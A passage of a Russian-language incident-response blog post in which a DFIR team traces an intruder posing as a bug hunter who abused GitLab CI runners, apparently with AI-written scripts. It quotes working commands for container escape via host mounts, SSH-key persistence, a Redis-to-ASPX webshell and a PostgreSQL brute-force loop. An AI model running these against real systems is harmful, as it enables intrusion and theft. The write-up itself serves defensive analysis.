{"id":484555,"date":"2026-06-22T12:45:58","date_gmt":"2026-06-22T12:45:58","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=484555"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=484555","title":{"rendered":"\u041c\u044b \u0441\u043f\u0440\u043e\u0441\u0438\u043b\u0438, \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440\u044b \u043e\u043d\u0438 \u0438\u043b\u0438 \u043d\u0435\u0442, \u043e\u043d\u0438 \u0441\u043a\u0430\u0437\u0430\u043b\u0438 \u00ab\u041d\u0435\u0442\u00bb"},"content":{"rendered":"<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<p>\u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442 \u043e\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b DFIR JetCSIRT! \u0425\u043e\u0442\u0438\u043c \u043f\u043e\u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f \u0441 \u0432\u0430\u043c\u0438 \u043e\u0434\u043d\u0438\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u043c \u043a\u0435\u0439\u0441\u043e\u043c, \u044d\u043c\u043e\u0446\u0438\u0438 \u043e\u0442 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043f\u0440\u0435\u043a\u0440\u0430\u0441\u043d\u043e \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u044d\u0442\u0430 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0430:<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/45a\/dff\/831\/45adff831dbb5a255bc02a4ba67dba07.png\" width=\"766\" height=\"748\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/45a\/dff\/831\/45adff831dbb5a255bc02a4ba67dba07.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/45a\/dff\/831\/45adff831dbb5a255bc02a4ba67dba07.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<h3>\u041d\u043e \u043e\u0431\u043e \u0432\u0441\u0435\u043c \u043f\u043e \u043f\u043e\u0440\u044f\u0434\u043a\u0443\u2026<\/h3>\n<p>\u0418\u0442\u0430\u043a. \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a \u0437\u0430\u0432\u043e\u0434\u0438\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442, \u0447\u0442\u043e \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u043f\u0443\u0448\u0438\u0442 \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0435 \u043a\u043e\u043c\u043c\u0438\u0442\u044b \u0432 GitLab. \u041f\u043e \u043f\u043e\u0447\u0442\u0435 \u043e\u043d\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043b\u0438, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u0441\u0435\u0431\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e access-\u0442\u043e\u043a\u0435\u043d\u043e\u0432, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u043e\u0432\u044b\u0445 \u0432\u0445\u043e\u0434\u043e\u0432 \u0432 \u0432\u0435\u0431 GitLab \u0432 \u044d\u0442\u043e\u0442 \u043f\u0435\u0440\u0438\u043e\u0434 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043d\u0435 \u0431\u044b\u043b\u043e. \u00a0\u041f\u043e\u0434\u043e\u0437\u0440\u0435\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u043b\u0438\u0447\u043d\u044b\u0439 \u043a\u043e\u043c\u043f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043e\u043d \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 GitLab. \u0412\u0430\u0436\u043d\u043e\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435: \u0432 \u043a\u043e\u043c\u043c\u0438\u0442\u0430\u0445 \u043e\u043d\u0438 \u0432\u0438\u0434\u044f\u0442 \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a <strong>X-BugBounty<\/strong>, \u043d\u043e, \u0441\u043e \u0441\u043b\u043e\u0432 \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0430, \u043e\u043d\u0438 \u043d\u0435 \u0443\u0447\u0430\u0441\u0442\u0432\u0443\u044e\u0442 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435 \u0431\u0430\u0433\u0431\u0430\u0443\u043d\u0442\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0443\u0432\u0435\u0440\u0435\u043d\u044b, \u0447\u0442\u043e \u0442\u0430\u043a \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a. \u0417\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0443\u0447\u0435\u0442\u043a\u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u0438 \u043d\u0430\u0447\u0430\u043b\u0438 \u0441\u043e\u0431\u0438\u0440\u0430\u0442\u044c \u0442\u0440\u0438\u0430\u0436 \u0441 \u0435\u0433\u043e \u0410\u0420\u041c \u043d\u0430 \u0430\u043d\u0430\u043b\u0438\u0437.<\/p>\n<p>\u041f\u043e\u043a\u0430 \u0441\u043e\u0431\u0438\u0440\u0430\u043b\u0438\u0441\u044c \u0434\u0430\u043d\u043d\u044b\u0435, \u043c\u044b \u0443\u0441\u043f\u0435\u043b\u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u0447\u0442\u043e \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b \u043d\u0430\u0448 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433:<\/p>\n<ul>\n<li>\n<p>\u0441\u043a\u0430\u043d \u0441 \u0443\u0437\u043b\u0430 runner;<\/p>\n<\/li>\n<li>\n<p>ssh-\u0431\u0440\u0443\u0442 \u0441 \u0443\u0437\u043b\u0430 runner;<\/p>\n<\/li>\n<li>\n<p>\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0441 \u0443\u0437\u043b\u0430 runner;<\/p>\n<\/li>\n<li>\n<p>impacket \u0441 \u0443\u0437\u043b\u0430 runner\u2026<\/p>\n<\/li>\n<\/ul>\n<p>\u0421\u0442\u043e\u0438\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e GitLab \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432\u043d\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443, \u043f\u043e\u0445\u043e\u0436\u0435, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u044b \u0447\u0435\u0440\u0435\u0437 runner, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d \u0443\u0436\u0435 \u0432\u043d\u0443\u0442\u0440\u0438, \u0442\u0435\u043c \u0441\u0430\u043c\u044b\u043c \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c\u0441\u044f \u0438 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c\u0441\u044f. \u041c\u044b \u0431\u044c\u0435\u043c \u0442\u0440\u0435\u0432\u043e\u0433\u0443, \u0438\u0437\u043e\u043b\u0438\u0440\u0443\u0435\u043c \u0443\u0437\u0435\u043b runner \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u043d\u0430 \u0430\u043d\u0430\u043b\u0438\u0437 \u0432\u0441\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 GitLab \u0438 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.<\/p>\n<h3>\u0427\u0442\u043e \u0436\u0435 \u0434\u0435\u043b\u0430\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a?<\/h3>\n<p>\u0412 \u0434\u0435\u043d\u044c \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 \u0432 00:11 \u043e\u043d \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0435\u0442 \u043f\u0440\u043e\u0435\u043a\u0442\u044b \u0447\u0435\u0440\u0435\u0437 gitlab-shell, \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0441 ssh-\u043a\u043b\u044e\u0447\u043e\u043c \u043f\u043e\u0434 \u0423\u0417 \u0442\u043e\u0433\u043e \u0441\u0430\u043c\u043e\u0433\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430. \u041e\u0442\u043a\u0443\u0434\u0430 \u0432\u0437\u044f\u043b\u0441\u044f ssh-\u043a\u043b\u044e\u0447, \u0441\u043f\u0440\u043e\u0441\u0438\u0442\u0435 \u0432\u044b? \u041f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u0435\u043c \u043f\u043e\u043a\u0430 \u043e\u0442\u043b\u043e\u0436\u0438\u0442\u044c \u044d\u0442\u043e\u0442 \u0432\u043e\u043f\u0440\u043e\u0441 \u0438 \u0432\u0435\u0440\u043d\u0443\u0442\u044c\u0441\u044f \u043a \u043d\u0435\u043c\u0443 \u0447\u0443\u0442\u044c \u043f\u043e\u0437\u0436\u0435.<\/p>\n<p>\u0412 00:24 \u043e\u043d \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0441\u0435\u0431\u0435 \u0442\u043e\u043a\u0435\u043d, \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435. \u0412 \u043b\u043e\u0433\u0430\u0445 jobs \u0432\u0438\u0434\u0438\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0441\u0442\u0438\u043b\u044c:<\/p>\n<details class=\"spoiler\">\n<summary>\u0414\u0438\u0441\u043a\u043b\u0435\u0439\u043c\u0435\u0440<\/summary>\n<div class=\"spoiler__content\">\n<p><em>\u0417\u0434\u0435\u0441\u044c \u0438 \u0434\u0430\u043b\u0435\u0435 \u043c\u044b \u0441\u043a\u0440\u044b\u0432\u0430\u0435\u043c \u043b\u044e\u0431\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u0443\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0438\u043b\u0438 \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0430:<\/em><\/p>\n<p><em>IP-\u0430\u0434\u0440\u0435\u0441 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u2013 100.100.100.100<\/em><\/p>\n<p><em>\u0414\u043e\u043c\u0435\u043d \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u2013 domain.su<\/em><\/p>\n<p><em>\u041d\u0438\u043a\u043d\u0435\u0439\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u2013 Bughunter<\/em><\/p>\n<p><em>\u0423\u0417 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0430 \u2013 \u0412\u0430\u0441\u044f \u041f\u0443\u043f\u043a\u0438\u043d (pupkin)<\/em><\/p>\n<\/div>\n<\/details>\n<p><code>===== JOB 3150646 TRACE START =====<\/code><\/p>\n<p><code>project=[masked]\/etz\/etz.front name=security-test status=success ref=security-test-Bughunter pipeline=805678 runner=743<\/code><\/p>\n<p><code>Running with gitlab-runner 17.10.0 (67b2b2db)<\/code><\/p>\n<p><code>Pulling docker image docker:20.10-dind ...<\/code><\/p>\n<p><code>Executing \"step_script\" stage of the job script<\/code><\/p>\n<p><code>$ echo \"X-BugBounty Bughunter - Security Test\"<\/code><\/p>\n<p><code>X-BugBounty Bughunter - Security Test<\/code><\/p>\n<p><code>$ whoami<\/code><\/p>\n<p><code>root<\/code><\/p>\n<p><code>$ id<\/code><\/p>\n<p><code>uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)<\/code><\/p>\n<p>\u0422\u043e \u0435\u0441\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0432\u043d\u043e\u0441\u0438\u0442 \u043a\u043e\u043c\u043c\u0438\u0442\u044b \u0432 .gitlab-ci.yml, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043f\u0430\u0439\u043f\u043b\u0430\u0439\u043d, \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f job security-test, runner \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440 \u0438 \u0432 \u043d\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438\u0437 script.<\/p>\n<p>\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u043e \u0431\u0430\u0437\u0435 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f. \u0427\u0442\u043e \u0441\u0430\u043c\u043e\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435, \u043f\u0435\u0440\u0435\u0434 \u043a\u0430\u0436\u0434\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 \u043e\u043d \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u043f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e echo.<\/p>\n<p><code>$ echo \"X-BugBounty Bughunter - escalation recon\"<\/code><\/p>\n<p><code>$ echo \"=== HOST FILESYSTEM ===\"<\/code><\/p>\n<p><code>$ docker run --rm -v \/:\/host alpine sh -c \"cat \/host\/etc\/hostname 2&gt;\/dev\/null; echo ---; cat \/host\/etc\/hosts 2&gt;\/dev\/null | head -30; echo ---; ls -la \/host\/home\/ 2&gt;\/dev\/null; echo ---; ls -la \/host\/root\/.ssh\/ 2&gt;\/dev\/null; cat \/host\/root\/.ssh\/known_hosts 2&gt;\/dev\/null | head -20\"[0;m<\/code><\/p>\n<p><code>$ echo \"=== GITLAB RUNNER CONFIG ===\"<\/code><\/p>\n<p><code>$ docker run --rm -v \/:\/host alpine sh -c \"find \/host -maxdepth 5 -name config.toml -path '*gitlab*' 2&gt;\/dev\/null -exec head -80 {} \\;\"[0;m<\/code><\/p>\n<p><code>concurrent = 10<\/code><\/p>\n<p><code>$ echo \"=== HOST NETWORK INTERFACES ===\"<\/code><\/p>\n<p><code>$ docker run --rm --net=host alpine ip addr show<\/code><\/p>\n<p><code>$ echo \"=== USER SSH KEYS ===\"<\/code><\/p>\n<p><code>$ docker run --rm -v \/:\/host alpine sh -c \"for d in \/host\/home\/*\/; do u=\\$(basename \\$d); echo --- \\$u ---; ls -la \\$d\/.ssh\/ 2&gt;\/dev\/null; cat \\$d\/.ssh\/id_rsa.pub 2&gt;\/dev\/null; cat \\$d\/.ssh\/authorized_keys 2&gt;\/dev\/null | head -5; done\"<\/code><\/p>\n<p>\u0412\u0430\u043c \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u00ab===\u00bb? \u0414\u0430-\u0434\u0430, \u0442\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u043e \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u044b ChatGPT \u0438 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0435 \u0418\u0418-\u0441\u0435\u0440\u0432\u0438\u0441\u044b.<\/p>\n<p>\u0417\u0434\u0435\u0441\u044c \u043e\u043d \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0430 \u0443\u0437\u043b\u0435 runner \u0441\u043e \u0441\u0432\u043e\u0438\u043c ssh-\u043a\u043b\u044e\u0447\u043e\u043c:<\/p>\n<p><code>$ echo \"=== STEP 1 - SSH KEY ON RUNNER HOST ===\"<\/code><\/p>\n<p><code>$ docker run --rm -v \/:\/host alpine sh -c \"echo 'ssh-ed25519 [masked] bb-bughunter-test' &gt;&gt; \/host\/root\/.ssh\/authorized_keys; cat \/host\/root\/.ssh\/authorized_keys\"<\/code><\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043e\u043d \u0441\u043a\u0430\u043d\u0438\u0442 \u043f\u043e\u0434\u0441\u0435\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e nmap. \u041f\u043e\u0442\u043e\u043c \u043f\u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u043c \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u043f\u043e\u0440\u0442\u0430\u043c \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u043a \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u043c. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u043a Redis-\u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u043a\u043b\u044e\u0447\u0435\u0439 \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0438\u0441\u0435\u0439:<\/p>\n<p><code>$ docker run --rm --net=host alpine sh -c ' # collapsed multi-line command<\/code><\/p>\n<p><code>=== REDIS [masked] (NO AUTH) ===<\/code><\/p>\n<p><code># Server<\/code><\/p>\n<p><code>[masked]<\/code><\/p>\n<p><code># Keyspace<\/code><\/p>\n<p><code>[masked]<\/code><\/p>\n<p><code>$ echo \"X-BugBounty Bughunter - Redis data extraction\"<\/code><\/p>\n<p><code>$ docker run --rm --net=host alpine sh -c ' # collapsed multi-line command<\/code><\/p>\n<p><code>=== REDIS db0 HGETALL sample ===<\/code><\/p>\n<p><code>[masked]<\/code><\/p>\n<p><code>=== REDIS db0 SECOND KEY ===<\/code><\/p>\n<p><code>[masked]<\/code><\/p>\n<p><code>=== REDIS db7 HGETALL sample ===<\/code><\/p>\n<p><code>[masked]<\/code><\/p>\n<p>\u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0433:<\/p>\n<p><code>$ docker run --rm --net=host alpine sh -c ' # collapsed multi-line command<\/code><\/p>\n<p><code>=== REDIS CONFIG SET PROOF ===<\/code><\/p>\n<p><code>--- Current dir ---<\/code><\/p>\n<p><code>dir<\/code><\/p>\n<p><code>C:\\Program Files\\Redis<\/code><\/p>\n<p><code>--- Set dir to IIS webroot ---<\/code><\/p>\n<p><code>OK<\/code><\/p>\n<p><code>--- Verify ---<\/code><\/p>\n<p><code>dir<\/code><\/p>\n<p><code>C:\\inetpub\\wwwroot<\/code><\/p>\n<p><code>--- Set dbfilename ---<\/code><\/p>\n<p><code>OK<\/code><\/p>\n<p><code>--- Verify ---<\/code><\/p>\n<p><code>dbfilename<\/code><\/p>\n<p><code>test-bughunter.txt<\/code><\/p>\n<p><code>--- Restore original ---<\/code><\/p>\n<p><code>OK<\/code><\/p>\n<p>\u0417\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u043f\u0443\u043d\u043a\u0442 \u00abRestore original\u00bb? \u0414\u0443\u043c\u0430\u044e, \u0447\u0442\u043e \u0441 \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u043c\u044b \u0432\u0441\u0435-\u0442\u0430\u043a\u0438 \u043f\u0435\u0440\u0435\u0441\u0442\u0430\u043d\u0435\u043c \u043d\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c. \u041f\u043e\u0432\u0441\u044e\u0434\u0443 \u0440\u0430\u0441\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0442\u0435\u0433\u0438 X-BugBounty, \u043a\u043e\u043c\u043c\u0438\u0442\u044b \u043e\u0442 ChatGPT, \u043f\u0430\u0442\u0442\u0435\u0440\u043d\u044b \u00ab\u043d\u0435\u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0439\u00bb \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043f\u043e \u043a\u0430\u043d\u043e\u043d\u0430\u043c \u0431\u0430\u0433\u0431\u0430\u0443\u043d\u0442\u0438, \u043e\u0442\u043a\u0430\u0442 \u043a \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044e\u2026 \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u0430\u043b\u044c\u0448\u0435 \u0431\u0443\u0434\u0435\u043c \u043d\u0430\u0437\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440\u043e\u043c-\u043d\u0435\u043b\u0435\u0433\u0430\u043b\u043e\u043c.<\/p>\n<p>\u0422\u0443\u0442 \u043e\u043d \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e RCE\u043d\u0430 \u0432\u0441\u0435 \u0442\u043e\u043c \u0436\u0435 Redis:<\/p>\n<p><code>$ echo \"=== STEP 2 - Write ASPX webshell payload ===\"<\/code><\/p>\n<p><code>$ redis-cli -h 10.50.101.17 SET bughunter-rce \"\\r\\n&lt;%@ Page Language=\\\"C#\\\" %&gt;&lt;%Response.Write(\\\"BUGHUNTER-BB-POC|\\\"+System.Environment.MachineName+\\\"|\\\"+System.Environment.UserName+\\\"|\\\"+System.Environment.UserDomainName+\\\"|\\\"+System.Environment.OSVersion.ToString());%&gt;\\r\\n\"<\/code><\/p>\n<p><code>$ redis-cli -h 10.50.101.17 BGSAVE<\/code><\/p>\n<p><code>Background saving started<\/code><\/p>\n<p><code>$ echo \"=== STEP 3 - Trigger webshell ===\"<\/code><\/p>\n<p><code>$ curl -sv -m 10 \"<\/code><a href=\"http:\/\/10.50.101.17\/bughunter-bb.aspx\"><code>http:\/\/10.50.101.17\/bughunter-bb.aspx<\/code><\/a><code>\" 2&gt;&amp;1 || true<\/code><\/p>\n<p><code>*\u00a0\u00a0 Trying 10.50.101.17:80...<\/code><\/p>\n<p><code>* Connected to 10.50.101.17 (10.50.101.17) port 80<\/code><\/p>\n<p><code>* using HTTP\/1.x<\/code><\/p>\n<p><code>&gt; GET \/bughunter-bb.aspx HTTP\/1.1<\/code><\/p>\n<p><code>&gt; Host: 10.50.101.17<\/code><\/p>\n<p><code>&gt; User-Agent: curl\/8.12.1<\/code><\/p>\n<p><code>&gt; Accept: <em>\/<\/em><\/code><\/p>\n<p><code>$ echo \"=== STEP 4 - Cleanup ===\"<\/code><\/p>\n<p><code>$ redis-cli -h 10.50.101.17 DEL bughunter-rce<\/code><\/p>\n<p>\u041f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0441\u0431\u0440\u0443\u0442\u0438\u0442\u044c \u0443\u0447\u0435\u0442\u043a\u0438 PostgreSQL \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u043c\u0438 \u043f\u0430\u0440\u043e\u043b\u044f\u043c\u0438:<\/p>\n<p><code>$ echo \"=== PG brute with found passwords ===\"<\/code><\/p>\n<p><code>$ export HOSTS=\"...\"<\/code><\/p>\n<p><code>$ export USERS=\"...\"<\/code><\/p>\n<p><code>$ export PASSWORDS=\"qwerty ciqwerty qwerty123! custom_pass test postgres password P@ssw0rd\"<\/code><\/p>\n<p><code>$ for h in $HOSTS; do for u in $USERS; do for p in $PASSWORDS; do RESULT=$(PGPASSWORD=$p psql -h $h -U $u -p 5432 -c \"SELECT current_database(),current_user,version();\" 2&gt;&amp;1 | head -3); if echo \"$RESULT\" | grep -q \"row\"; then echo \"SUCCESS $h $u\/$p\"; echo \"$RESULT\"; fi; done; done; done<\/code><\/p>\n<p>\u0422\u0430\u043a\u0436\u0435 \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u043a Elasticsearch \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438:<\/p>\n<p><code>=== Try Elasticsearch without auth ===<\/code><\/p>\n<p><code>$ curl -sk -m 5 http:\/\/10.50.101.3:9200\/ || true<\/code><\/p>\n<p><code>$ curl -sk -m 5 http:\/\/10.50.101.2:9200\/ || true<\/code><\/p>\n<p><code>$ curl -sk -m 5 http:\/\/10.50.101.4:9200\/ || true<\/code><\/p>\n<p>\u0421\u043e\u0437\u0434\u0430\u0435\u0442 \u0438\u043d\u0434\u0435\u043a\u0441 Elasticsearch \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0442\u0443\u0434\u0430 \u0434\u0430\u043d\u043d\u044b\u0435 